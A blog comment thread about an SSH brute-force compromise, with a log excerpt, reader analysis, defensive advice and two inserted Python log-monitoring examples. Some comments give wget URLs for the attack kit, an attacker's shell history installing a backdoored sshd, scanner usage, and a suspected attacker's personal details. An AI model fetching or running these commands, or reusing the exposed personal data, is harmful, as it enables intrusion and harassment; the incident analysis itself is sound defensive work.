 Invalid user weblogic from 64.124.102.44
 Invalid user webmail from 64.124.102.44
 Invalid user webmaster from 64.124.102.44
 Invalid user website from 64.124.102.44
 Invalid user weed from 64.124.102.44
 Invalid user wembley from 122.201.70.12
 Invalid user whiteangel from 64.124.102.44
 Invalid user white from 64.124.102.44
 Invalid user william123 from 64.124.102.44
 Invalid user william321 from 64.124.102.44
 Invalid user william from 64.124.102.44
 Invalid user wilson from 64.124.102.44
 Invalid user windows from 64.124.102.44
 Invalid user worthy from 122.201.70.12
 Invalid user www123 from 64.124.102.44
 Invalid user www from 64.124.102.44
 Invalid user www from 66.235.201.39
 Invalid user www from 75.126.69.5
 Invalid user wwwrun from 64.124.102.44
 Invalid user xam from 64.124.102.44
 Invalid user xbitchx from 64.124.102.44
 Invalid user xchat from 64.124.102.44
 Invalid user xfs123 from 64.124.102.44
 Invalid user xfs from 64.124.102.44
 Invalid user ydnah from 64.124.102.44
 Invalid user yoshida123 from 64.124.102.44
 Invalid user yoshida321 from 64.124.102.44
 Invalid user yoshida from 64.124.102.44
 Invalid user yssor from 64.124.102.44
 Invalid user z1x2c3 from 64.124.102.44
 Invalid user zabbix from 75.126.69.5
 Invalid user zachary from 64.124.102.44
 Invalid user zoe from 64.124.102.44
 Invalid user zuperman from 64.124.102.44
 Invalid user zxcvb from 64.124.102.44
 Invalid user zxcvbn from 64.124.102.44

Comments (42) Trackbacks (2)
  1. The IP addresses are probably victims. My guess is (s)he’s turning the box into another zombie which he/she can then use to attack others.

  2. Yeah, you may be right about that. It seems odd that it’s such a small, geographically limited list. I checked one of them and it’s from Malaysia. I’ve thought that it may also be IPs that it will take orders from?

  3. Best guess on the IP address is sending something back to momma in Australia

    http://samspade.org/whois/211.27.148.92

    inetnum: 211.26.0.0 – 211.27.255.255
    netname: INTERNETPRIMUS
    descr: Primus Telecommunications
    descr: Internet Services Network
    country: AU
    admin-c: jp21-ap
    tech-c: rc35-ap
    mnt-by: APNIC-HM
    mnt-lower: MAINT-PRIMUS-AU
    status: ALLOCATED PORTABLE
    remarks: —————————–
    remarks: This object can only be modified by APNIC hostmaster
    remarks: If you wish to modify this object details please
    remarks: send email to hostmaster@apnic.net with your organisation
    remarks: account name in the subject line.
    remarks: —————————–
    changed: hm-changed@apnic.net 20030930
    source: APNIC
    person: Jeff Pace
    nic-hdl: JP21-AP
    e-mail: netops@primus.com.au

    address: L3 1 Alfred Street
    address: Circular Quay
    address: Sydney NSW Australia
    address: 2000
    phone: 61-2-9423 2400
    fax-no: 61-2-9423 2410
    country: AU
    changed: netops@primus.com.au 20030724
    mnt-by: MAINT-PRIMUS-AU
    source: APNIC
    person: Richard Coombe
    nic-hdl: RC35-AP
    e-mail: netops@primus.com.au

    Level 3 is the sysop/network

  4. Just had one of our customers hit by the exact same kit. Seems they go around and search for weak root passwords.

    Attacker’s IP: 92.84.130.255
    The machine responsible for attacking the VPS in the first place is: 91.135.235.130

  5. Hrm, auto formatting. Let’s try that usage line again…

    usage: %s <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>]
    speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)

  6. @James – That first IP appears to be from Romania, and the second from the UK. I suppose at least one of those is another compromised machine?

    @Kenny – Thanks for the insight on those IPs. I don’t quite understand where those particular IPs are coming from. Just a random assortment of new targets running ssh? I tried using a reverse DNS lookup on a few of them, but it was unsuccessful.

  7. A network/port scanner is like a brute forcer or wardialer for network services. This scanner was pointed at the 211 class-A and tried connecting to every IP (211.*.*.*) on port 22. The IP addresses listed are the hosts that answered. They were targets for the attacks coming from your host, but not yet victims. If you had any entries in vuln.txt, then you would have victims to notify. (Contents could have been removed.) The IPs are all over the APNIC map: China, Taiwan, Malaysia, Australia, and Korea.

    AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name
    9808 | 211.140.242.87 | 211.140.192.0/18 | CN | apnic | 2000-08-18 | CMNET-GD Guangdong Mobile Communication Co.Ltd.
    3462 | 211.20.141.33 | 211.20.0.0/16 | TW | apnic | 2000-06-30 | HINET Data Communication Business Group
    9930 | 211.24.143.103 | 211.24.128.0/17 | MY | apnic | 2002-10-24 | TTNET-MY TIME DOTCOM BERHAD
    9443 | 211.27.148.70 | 211.27.144.0/20 | AU | apnic | 2003-09-30 | INTERNETPRIMUS-AS-AP Primus Telecommunications
    9318 | 211.33.112.228 | 211.33.0.0/17 | KR | apnic | 1999-08-27 | HANARO-AS Hanaro Telecom Inc.
    15412 | 211.43.150.141 | 211.43.150.0/24 | KR | apnic | 1999-11-18 | FLAG-AS Flag Telecom Global Internet AS

    Oh, and as for why they changed your password, the script kiddie’s MO is “own more stuff than the other guy.” If they share, then someone else is likely to get the attention of the admin and spoil the fun. So they plug obvious holes, like the one they got in through. Generally speaking, an admin who isn’t present enough to change a default password won’t notice if it gets changed for them.

  8. screen is a terminal multiplexer, ssh to a server, type ‘screen’ and you can have multiple ‘sessions’ although you’ve only logged in once. (That’s not the most accurate description but once you try it out, you’ll understand…it’s pretty awesome.)

    It was probably somebody who got really lucky and was just typing stuff they saw on some website, hence the typo (and the reason for changing the password). As you noted, someone less careless would have been more difficult to detect.

  9. Thanks for your comment Ashley. I’m actually familiar with screen, but what I wasn’t sure about was whether screen logged its commands to .bash_history. It turns out it doesn’t (or at least not the way things are configured on my machine). So that may explain why certain files appeared on my machine, with no reference in the history as to how they got there.

    I agree with you though, this was probably just the work of a script kiddie — I almost certainly wouldn’t have caught it (or at least not for a much longer time) if it was the work of someone more experienced.

  10. You can get these files from this address
    wget adelinuangell.lx.ro/cote/go.tar
    This guy accessed my computer and logged some commands to .bash_history.
    I found this address in .bash_history.
    Screen is a utility to remove log information from wtmp/utmp, I think.

  11. Yeah just got hit with the same thing less than 24 hours after getting a new VPS. Some details I found:

    found /var/tmp/war2010

    with these files:

    drwx------ 2 501 501 4096 Aug 29 18:26 .
    drwxrwxrwt 3 root root 4096 Aug 29 20:04 ..
    -rwx--x--x 1 501 501 680 Jan 28 2010 a
    -rwxr-xr-x 1 501 501 0 Jan 13 2010 nobash.txt
    -rwx--x--x 1 501 501 12639 Aug 29 18:21 pass.txt
    -rwx--x--x 1 501 501 11464 May 16 2005 pscan2
    -rwxr-xr-x 1 501 501 249980 Feb 13 2001 screen
    -rwx--x--x 1 501 501 1384518 Jun 6 2005 sshd
    -rwxr-xr-x 1 501 501 2759 Jan 28 2010 start
    -rwxr-xr-x 1 501 501 0 Jan 7 2010 vuln.txt

    Appears to be brute force but then user Raul just logged in as root…?

    fh1:/var/log# grep -R raul *
    auth.log:Aug 29 07:47:15 fh1 sshd[1843]: Invalid user raul from 122.160.169.162
    auth.log:Aug 29 07:47:17 fh1 sshd[1843]: Failed password for invalid user raul from 122.160.169.162 port 56503 ssh2
    auth.log:Aug 29 15:11:47 fh1 useradd[26172]: new group: name=raul, GID=1011
    auth.log:Aug 29 15:11:47 fh1 useradd[26172]: new user: name=raul, UID=0, GID=1011, home=/home/raul, shell=/bin/sh
    auth.log:Aug 29 15:11:58 fh1 passwd[26190]: pam_unix(passwd:chauthtok): password changed for raul
    auth.log:Aug 29 15:13:43 fh1 sshd[28273]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94-195-119-17.zone9.bethere.co.uk user=raul
    auth.log:Aug 29 15:13:45 fh1 sshd[28273]: Failed password for raul from 94.195.119.17 port 2519 ssh2
    auth.log:Aug 29 15:13:57 fh1 sshd[28273]: Accepted password for raul from 94.195.119.17 port 2519 ssh2
    auth.log:Aug 29 15:13:57 fh1 sshd[28273]: pam_unix(sshd:session): session opened for user raul by (uid=0)
    auth.log.0:Aug 28 17:09:55 fh1 sshd[32053]: Invalid user raul from 222.122.163.116
    auth.log.0:Aug 28 17:09:57 fh1 sshd[32053]: Failed password for invalid user raul from 222.122.163.116 port 44453 ssh2
    auth.log.0:Aug 28 17:13:08 fh1 sshd[9559]: Invalid user raul from 222.122.163.116
    auth.log.0:Aug 28 17:13:11 fh1 sshd[9559]: Failed password for invalid user raul from 222.122.163.116 port 48574 ssh2
    mail.info:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBIqRT005603: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:02:10, xdelay=00:00:00, mailer=relay, pri=1020535, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.info:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBHq39003999: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:03:10, xdelay=00:00:00, mailer=relay, pri=1022653, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.log:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBIqRT005603: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:02:10, xdelay=00:00:00, mailer=relay, pri=1020535, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    mail.log:Aug 29 19:21:02 fh1 sm-msp-queue[3425]: o7TBHq39003999: to=raul2704@yahoo.com, ctladdr=root (0/0), delay=04:03:10, xdelay=00:00:00, mailer=relay, pri=1022653, relay=[127.0.0.1] [127.0.0.1], dsn=4.0.0, stat=Deferred: Connection refused by [127.0.0.1]
    rkhunter.log:[18:22:33] Warning: Account ‘raul’ is root equivalent (UID = 0)

    From email address found this info:

    http://www.wayn.com/profiles/raul2704raul2704@yahoo.com

    Raul Lonzaga
    Gender : male
    Age : 39
    Nationality : Filipino
    Location :
    North Cotabato, Philippines
    Last login : 29th August 2010
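
The auth.log excerpt in comment 11 carries three signals worth alerting on: a `useradd` entry that creates a second UID 0 account, a login under a name that earlier appeared as `Invalid user`, and a password accepted right after failures from the same address. The Python check below is an added example, not part of the original post or its comments; the sample log lines, hostname, account names, addresses and finding labels are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the sshd/useradd syslog format quoted in comment 11.
# Hostname, PIDs, account names and the RFC 5737 addresses are invented.
SAMPLE_LOG = """\
Aug 29 07:47:15 host1 sshd[1843]: Invalid user backup2 from 203.0.113.7
Aug 29 07:47:17 host1 sshd[1843]: Failed password for invalid user backup2 from 203.0.113.7 port 56503 ssh2
Aug 29 15:11:47 host1 useradd[26172]: new user: name=backup2, UID=0, GID=1011, home=/home/backup2, shell=/bin/sh
Aug 29 15:12:01 host1 useradd[26201]: new user: name=deploy, UID=1002, GID=1002, home=/home/deploy, shell=/bin/bash
Aug 29 15:13:45 host1 sshd[28273]: Failed password for backup2 from 198.51.100.9 port 2519 ssh2
Aug 29 15:13:57 host1 sshd[28273]: Accepted password for backup2 from 198.51.100.9 port 2519 ssh2
Aug 29 16:02:10 host1 sshd[29100]: Accepted publickey for deploy from 192.0.2.20 port 40112 ssh2
"""

# The user name is remote input and may contain spaces, so it is matched
# greedily and the source address is taken from the end of the line.
INVALID = re.compile(r"sshd\[\d+\]: Invalid user (.*) from (\S+)$")
FAILED = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(.*) from (\S+) port \d+ ssh2$")
ACCEPTED = re.compile(
    r"sshd\[\d+\]: Accepted (\S+) for (.*) from (\S+) port \d+ ssh2$")
USERADD = re.compile(r"useradd\[\d+\]: new user: name=([^,]+), UID=(\d+)")


def analyze(log_text):
    """Return (label, user, source_ip) findings in log order."""
    findings = []
    guessed = set()               # names that did not exist when first tried
    failures = defaultdict(int)   # (user, ip) -> failed password count
    uid0_created = set()          # non-root accounts created with UID 0

    for line in log_text.splitlines():
        line = line.rstrip()
        if m := INVALID.search(line):
            guessed.add(m.group(1))
        elif m := FAILED.search(line):
            failures[(m.group(1), m.group(2))] += 1
        elif m := USERADD.search(line):
            name, uid = m.group(1), int(m.group(2))
            if uid == 0 and name != "root":
                uid0_created.add(name)
                findings.append(("uid0-account-created", name, None))
        elif m := ACCEPTED.search(line):
            method, user, ip = m.groups()
            if user in uid0_created:
                findings.append(("login-as-new-uid0-account", user, ip))
            if user in guessed:
                findings.append(("login-as-previously-invalid-user", user, ip))
            if method == "password" and failures[(user, ip)] > 0:
                findings.append(("password-accepted-after-failures", user, ip))
    return findings


if __name__ == "__main__":
    for label, user, ip in analyze(SAMPLE_LOG):
        print(f"{label:36} user={user} from={ip}")
```

Rotated logs need to be fed oldest first (`auth.log.1` before `auth.log`), otherwise the ordering the checks rely on is lost.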

  12. Thanks for the additional info.

  13. Give kippo-honeypot a go http://code.google.com/p/kippo/ It’s an SSH honeypot. Very simple but very effective. I have caught the very same gosh.tgz that way

  14. lol, that’s a really cool-looking program, thanks!

  15. That is an SSH brute force scanner and is quite common in the script kiddie group. The bad thing about it is that it is used to scan an entire IP class (noticed ./ss -a); the attacker has scanned 211.*.*.*, and on a machine without a good processor this can crash the Linux machine in a few seconds.

    mfu.txt is the list of the IPs, sorted for duplicate entries.
    pscan2 is a scan binary used to run the scanner as a non-root user, since ./ss can be used only by a uid 0 user.

    As usual this is normal behaviour for Linux kiddies; they get some shit like this and ruin people’s PCs.
    As far as I know there is a new hacking report service at http://rep.hack-report.info. They are new in the business but are doing good work: once your site is reported as attacked and a log is submitted, they report the attacker to the local authorities of whatever country the attacker is in. In your case I am sorry to announce that the attacker is from my country, Romania; I know that because I have personally investigated some attacks and I have found this scanner.

  16. Excellent info, thanks.

  17. I have seen thousands of these attacks, and was so annoyed at watching my logs fill up with rubbish that I wrote a Linux service to monitor syslog, gather the evidence, ban the IP address with iptables, get the abuse address responsible for the IP address and send a mail notifying them that one of their machines is owned, after checking a do-not-mail list of delinquent ISPs.
    In many cases the mails are ignored, bounce or defer (which are then added to the do-not-mail db) but some are actually read and acted upon, and some compromised machines do get fixed, and sometimes even with a thank you note, which really does make the 100,000+ messages I have sent worthwhile.

    The ip addresses go into a database, currently 1.25 million rows, each containing the date of the last ten times seen, ban type, status and how many times banned. They are linked to another table containing the evidence.

    Another process expires the ban from iptables (10 * number of bans) days later.
    It also handles ftp brute force attacks.

    I have another one that scans the maillog, and sends reports for smtp and pop3 abuses… It’s good to kick some ass in return!

    I will publish it soon, but not on my own site!
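
A small model of the ban bookkeeping described in comment 17, as an added Python example (not the commenter's service, which the page does not show): it counts `Failed password` lines per source address, bans at a threshold, and sets the expiry to 10 * number of bans days. The threshold, window, sample lines and the shape of the `iptables` rule are assumptions; the code only builds the rule arguments and never runs them.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Anchored at the end of the line: the user name is attacker-controlled and can
# itself contain " from <ip> port <n> ssh2", so only the final address is used.
FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for .* from (\S+) port \d+ ssh2$")

THRESHOLD = 5                    # assumption: failures that trigger a ban
WINDOW = timedelta(minutes=10)   # assumption: sliding window for counting
BAN_DAYS_PER_OFFENCE = 10        # from the comment: 10 * number of bans


def parse_failure(line, year):
    """Return (timestamp, ip) for a failed-password line, else None."""
    m = FAILED.match(line.rstrip())
    if not m:
        return None
    try:
        ip = str(ipaddress.ip_address(m.group(2)))  # reject anything not an IP
    except ValueError:
        return None
    # Classic syslog timestamps carry no year, so the caller supplies it.
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, ip


def iptables_rule(ip):
    """Argument list for a drop rule; validated so log text never reaches a shell."""
    addr = ipaddress.ip_address(ip)
    tool = "iptables" if addr.version == 4 else "ip6tables"
    return [tool, "-I", "INPUT", "-s", str(addr), "-j", "DROP"]


class BanTracker:
    def __init__(self, year):
        self.year = year
        self.recent = defaultdict(deque)   # ip -> failure times inside WINDOW
        self.ban_count = defaultdict(int)  # ip -> how many times banned so far
        self.banned_until = {}             # ip -> expiry of the current ban

    def feed(self, line):
        """Return (ip, expiry) when this line triggers a new ban, else None."""
        parsed = parse_failure(line, self.year)
        if parsed is None:
            return None
        ts, ip = parsed
        if self.banned_until.get(ip, datetime.min) > ts:
            return None                    # still banned, nothing new to do
        q = self.recent[ip]
        q.append(ts)
        while ts - q[0] > WINDOW:
            q.popleft()
        if len(q) < THRESHOLD:
            return None
        q.clear()
        self.ban_count[ip] += 1
        expiry = ts + timedelta(days=BAN_DAYS_PER_OFFENCE * self.ban_count[ip])
        self.banned_until[ip] = expiry
        return ip, expiry


def replay(lines, year):
    tracker = BanTracker(year)
    bans = [ban for ban in map(tracker.feed, lines) if ban]
    return bans, tracker


def _burst(stamp, ip):
    """Five constructed failures, one second apart."""
    return [f"{stamp}:0{i} host1 sshd[1843]: Failed password for invalid user "
            f"test from {ip} port 56503 ssh2" for i in range(1, 6)]


# Constructed line whose user name tries to shift the blame to 192.0.2.1.
SPOOFED = ("Aug 30 09:05:00 host1 sshd[1901]: Failed password for invalid user "
           "x from 192.0.2.1 port 22 ssh2 from 198.51.100.9 port 4000 ssh2")

# Constructed log: a burst, a hit during the ban, the spoofed line, a repeat burst.
SAMPLE = (_burst("Aug 29 07:47", "203.0.113.7")
          + ["Aug 30 09:00:00 host1 sshd[1900]: Failed password for root "
             "from 203.0.113.7 port 40000 ssh2"]
          + [SPOOFED]
          + _burst("Sep 10 07:00", "203.0.113.7"))

if __name__ == "__main__":
    for ip, expiry in replay(SAMPLE, 2010)[0]:
        print(" ".join(iptables_rule(ip)), "# expires", expiry.isoformat())
```

The end-of-line anchor matters for any tool that bans on log content: with a looser pattern, a crafted user name could get an address of the attacker's choosing blocked.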

  18. lol,
    It’s a script to brute-force root accounts, but there is no attacker’s real IP, because once the hacker has hacked the first shell, from that shell he hacks others; it is a long process to scan thousands of IPs, so he needs a Linux shell that stays online 24/7, and only VPSs or workstations have these abilities, with high-performance processors like Intel Xeon, i7, AMD Opteron etc. Hackers need Linux shells to build on: servers to control other zombie clients, or to perform a high-traffic DDoS attack, etc.

    Plz don’t waste time to catch the person who did this. Only try securing ur Box,

    -Use Updated Firewalls
    -I complicated Password
    -And don’t create kiddy users.
    -Use other ports for SSH & Telnet not the Default Port like 22-23.

    Best regards
    Ilir Prenku from Kosova

  19. Ilir,
    I know this won’t catch the hacker because they can be behind a long chain of proxies, but it helps to alert the owners that their server is hacked and get it cleaned up and secured.
    Hopefully they will learn to be better administrators and not use stupid passwords!

  20. You have been hacked by a Romanian hackers team, and I read in that screen:
    “privat scanner.the scanner can be used only by `MaLaSorTe` team.This scanner `contain` a password file by 3 megabytes long”.
    lol, try to find the log pass 3mb one and delete it cause maybe it is chmod 777, and look for other files chmod 777 cause the hackers are writing executables in your server and then they are upgrading your server to laugh :))

  21. I have the full script and I have toyed with it. Try to use ./go.sh 140.0; it scans ranges of IPs and then bruteforces the pws :) I have popped like 50 root pws now, kinda cool really, but I don’t do anything with them. I typed that from root ssh and it will scan for a bit; La-AmParam means you got one. It will place the cracked roots in a file called Vuln.txt. It’s just a simple scanner, no harm, but it uses a lot of bandwidth. Watch out for scan.pl tho because that’s a UDP, TCP, XSS, RFI, LFI scanner! Perl

  22. Yeah bro, I don’t think http://rep.hack-report.info will be doing much of anything; their account is suspended for Hacking the BOX ROFL ROFL ROFL. Not to sound kiddy like :) but disable History -c :)) find the sob, kick his door in :) smack him around a bit, tell him why you are there and then take off

  23. I just went to the history command and found that two directories were created, one in /home/root called zen and another in /tmp called .ssh. I just deleted all. I just cannot understand how it is possible that someone called human would do this. Should we apply the same laws that we apply for productive people? fuf…………. the guy like downloaded alecsafk.ilive.ro/a/a.tgz. Here is what he did (he is even so stupid that he made a typo!!)

    874 w
    875 wget alecsafk.ilive.ro/a/a.tgz
    876 ls
    877 tar xzvf zen-bot.jpg
    878 cd zen
    879 ls
    880 cat a
    881 cat b
    882 cat c
    883 ./c 85.25
    884 ./zmeu
    885 ./c
    886 ls
    887 cat c
    888 cat
    889 sed
    890 ls
    891 cat vuln |more
    892 ./zmeu bios.txt vuln.txt 200 path
    893 cat a
    894 cat b
    895 cat f
    896 cat d
    897 cat bios.txt |sort |uniq > zmeu.txt
    898 wc -l zmeu
    899 wc -l zmeu.txt
    900 ./zmeu zmeu.txt vuln.txt 200 path
    901 clear
    902 ls
    903 nano c
    904 ls
    905 chmod +x *
    906 rm -rf zmeu.txt vuln bios.txt
    907 ./c 217.151
    908 cd /tmp
    909 tar xzvf s.jpg
    910 rm -rf s.jpg
    911 mv ssh1 .ssh1
    912 cd .ssh1
    913 nano inst
    914 ./inst
    915 /etc/init.d/sshd restart
    916 cat backdoor.h
    917 /sbin/ipconfig
    918 /sbin/ifcongi |grep inet
    919 /sbin/ifconfig |grep inet
    920 /sbin/ifconfig
    921 /etc/init.d/ssh restart

  24. It’s a script that scans for other computers that have vulnerable ssh passwords (the same way he hacked your computer). He changed the eth0 because the scanner needs that subnet and stuff. The mfu are a list of possible vulnerable victims. karl-koch@hotmail.com if I can help you, Messenger.

  25. ” SCANER PRIVAT
    SCANER FOLOSIT DOAR DE TEAMUL MaLaSorTe
    SACNERUL CONTINE UN PASS_FLIE DE 3MEGA !! ”
    Translate this from Romanian to your language.
    These are Romanian script kiddies. You can’t trace them to Romania because they use multiple servers just like Lotus said. Get a server, scan from it till it breaks.

    Anyway. It’s an ssh bruteforce scan. The best way to avoid being hacked is:
    1. USE strong passwords.. generated ones.
    2. use a firewall to block all networks on ssh, except yours obviously.
    3. Security by Obscurity : http://null.redcodenetwork.ro/changing-the-ssh-port-without-changing-it/

  26. Oh! This is alarming. I thought Linux had great security in preventing hacker attacks. However, there seems to be a way to enter into any server. While technology keeps advancing, so do the hacking techniques.

    I think these hackers use a network of proxies which make it difficult to identify from which IP they are targeting the server. While ssh is the most easily used one to gain access to remote shell, this is where we need to make it more secure.

  27. The best way to secure your server is to change your ssh server port, or to disable root login (they can get access to your server by a user, and use some local root exploit to gain root access), because the ssh scanners use port 22 to scan victims. On my server, the ssh is using a 4 number port, like 6354, and it never got hacked.
    PS: sorry for my bad English :P

  28. Installing and configuring Fail2Ban will help too for securing the server, by blocking the IP address of somebody that tries to access the server after a couple of tries. The default is 3. This alone is not enough, but it can be added next to the other suggestions that were mentioned in this blog.

  29. Basically what everybody else said. The “ss” binary is designed to scan an IP range for servers with a given port open. It does thousands of scans per minute and saves the results to a text file. The other executables take an input file (the IP list) and an output file. It’s most likely that if you got broken into, it was through a really simple ssh brute force (seriously, password is not a good password), an RFI exploit, or even an RCE exploit (google them). Use your brains when setting up a server and you’ll be fine.

  30. nice nice hacker not good :Ddont hack shells nu intaleg nimica ce e acolo shell root plmeqa password go.sh i scanner ssh backgrond you cna yuzet on backtrak5 :D nige but wohh i du dat :D:DD:D:D:

  31. Hi guys! I just saw what you wrote. Unfortunately most of the so called “hackers” are from Eastern Europe (e.g. Macedonia, Bulgaria, Romania, etc.). They are just using your machine to gain access to other machines and so on… Probably you have a weak password (pass, password, 123456, root… so on) and do not have a honeypot installed. Try installing a honeypot and keeping your system up-to-date. It always helps. Another personal point of view is that if you disable root login it will be safe. Another idea would be to uninstall commands editor (pico, nano) and also wget, apt-get, yum, ftp and stuff like this. If you don’t allow him to access external links he will find your machine useless and move on to the next one.
    Best Regards,
    Chip.

  32. There are a lot of vulnerabilities, not only bruteforce on ssh 22. They can get into your computer through Apache or phpMyAdmin vulnerabilities and much more.

  33. You can install Fail2Ban and block all IPs which have more than xxx failures and report the attacker automatically over https://www.blocklist.de to the provider.

  34. The MFU.TXT, it’s the IP range the hacker scans with the ssh scanner; it’s an ssh-root scanner.
    The result must be in a txt called ” VULN.TXT ”
    IT’S AN OLD KIND OF SSH SCANNER BY ROMANIAN HACKER TEAM
    THEY HAVE NOW A NEW ONE AND MORE STRONGER IN ARAB TEAM AND INDONESIAN TEAM ……

  35. THE SCAN AS FOLLOW FROM IP
    ./go.sh 211
    ./GO-SH +IP <> START SCAN FROM 211.0.0.1 — TO — 211.255.255.255
    AFTER GET THE RESULT AND FIND PORT 22 OPEN ON SOME IP
    PROGRAM MAKE CHECK THE IP WITH PASS FILE CALLED
    pass_file <<>>

    root /root
    root/admin
    root/guest
    root/123

    :D

  36. If anyone is interested: the exact same “gosh” package was uploaded in Oct 2013
    on my ssh-honeypot.. it was retrieved from:

    http://gblteam.webs.com/gosh_tgz_tar

  37. I think the virus turns the server into a VPS server or something, so it’s like I am hosting a VPS server

  38. I just realized that one of my servers (an OpenVZ container launched with many others alongside) got hacked the exact same way.
    What is strange is that I already ran SSH on a non-standard port like 40022.
    In my case the deploy user that I use for accessing a local git repository was hacked – I’m not even sure what password was set for that user.

    Is there any way I can clean up my server, or should I drop it and start with a new VPS?

  39. I have this exact problem this very moment on one of my servers, and I’m not able to get rid of it. I disabled root login via ssh, deleted binaries and all the related files, and somehow this guy gets root again and has these files again in /usr/share/locales/af/ …

    What would be proper procedure to get rid of this thing?

  40. Hey, I recommend blocking them with fail2ban and http://www.badips.com, you’ll see a lot of attackers already reported to badips.com, so your logs will also be cleaner.

  41. Hello, this scanner (brute force) is made by a Romanian (like me).

